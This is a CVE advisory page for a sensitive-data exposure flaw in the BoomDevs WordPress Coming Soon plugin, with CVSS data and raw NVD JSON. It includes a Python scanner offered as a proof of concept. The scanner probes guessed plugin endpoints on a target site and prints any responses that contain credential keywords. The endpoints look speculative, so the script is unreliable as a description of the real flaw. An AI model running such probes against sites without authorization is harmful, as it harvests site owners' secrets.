Security Vulnerability Report
中文
CVE-2025-62083 CVSS 4.3 MEDIUM

CVE-2025-62083

Published: 2025-12-31 17:15:45
Last Modified: 2026-04-23 15:34:31

Description

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in WP Messiah BoomDevs WordPress Coming Soon coming-soon-by-boomdevs allows Retrieve Embedded Sensitive Data.This issue affects BoomDevs WordPress Coming Soon: from n/a through <= 1.0.4.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

BoomDevs WordPress Coming Soon plugin <= 1.0.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-62083 PoC - BoomDevs Coming Soon Sensitive Data Exposure # Target: WordPress with boomdevs-coming-soon plugin <= 1.0.4 def check_vulnerability(target_url): """Check if target is vulnerable to CVE-2025-62083""" # Common endpoints that might expose sensitive data endpoints = [ '/wp-json/boomdevs/v1/config', '/wp-json/boomdevs/v1/settings', '/?rest_route=/boomdevs/v1/config', '/?rest_route=/boomdevs/v1/settings', '/wp-admin/admin-ajax.php?action=boomdevs_get_config' ] print(f"[*] Scanning target: {target_url}") print(f"[*] CVE-2025-62083 - BoomDevs Coming Soon Data Exposure\n") for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: # Check if response contains sensitive keywords sensitive_keywords = ['api_key', 'password', 'secret', 'token', 'credential'] response_lower = response.text.lower() if any(keyword in response_lower for keyword in sensitive_keywords): print(f"[!] VULNERABLE: {url}") print(f"[!] Status: {response.status_code}") print(f"[!] Response contains sensitive data:") print(response.text[:500]) return True elif 'boomdevs' in response_lower or 'coming' in response_lower: print(f"[?] POTENTIAL: {url}") print(f"[?] Status: {response.status_code}") print(f"[?] Response preview: {response.text[:200]}") except requests.RequestException as e: print(f"[-] Error accessing {url}: {e}") print("[*] No obvious vulnerability endpoint found") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62083", "sourceIdentifier": "[email protected]", "published": "2025-12-31T17:15:45.327", "lastModified": "2026-04-23T15:34:30.530", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in WP Messiah BoomDevs WordPress Coming Soon coming-soon-by-boomdevs allows Retrieve Embedded Sensitive Data.This issue affects BoomDevs WordPress Coming Soon: from n/a through <= 1.0.4."}, {"lang": "es", "value": "Exposición de Información Sensible del Sistema a una Esfera de Control No Autorizada vulnerabilidad en WP Messiah BoomDevs WordPress Coming Soon Plugin permite Recuperar Datos Sensibles Incrustados. Este problema afecta a BoomDevs WordPress Coming Soon Plugin: desde n/a hasta 1.0.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/coming-soon-by-boomdevs/vulnerability/wordpress-boomdevs-wordpress-coming-soon-plugin-plugin-1-0-4-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}